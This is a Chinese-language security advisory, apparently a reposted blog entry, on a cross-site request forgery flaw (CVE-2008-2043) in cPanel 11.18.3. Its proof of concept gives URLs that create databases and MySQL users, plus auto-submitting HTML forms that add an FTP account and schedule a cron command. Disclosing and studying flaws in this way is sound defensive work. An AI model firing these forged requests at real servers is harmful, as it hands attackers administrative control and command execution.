cPanel跨站请求伪造漏洞

发布日期:2008-04-28
更新日期:2008-05-05

受影响系统:
cPanel cPanel 11.18.3 build ID 21703
描述:
CVE(CAN) ID: CVE-2008-2043

cPanel是基于web的工具,用于自动化控制网站和服务器。

cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。

<*来源:Rook Security
  
  链接: http://secunia.com/advisories/30027/
         http://www.kb.cert.org/vuls/id/584089
         http://www.rooksecurity.com/blog/?p=7
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name

创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin

添加ftp用户:
<html>
<form id=1 method=’post’ action=’ http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

每小时运行一次命令行:
<html>
<form id=2 method=’post’ action=’ http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值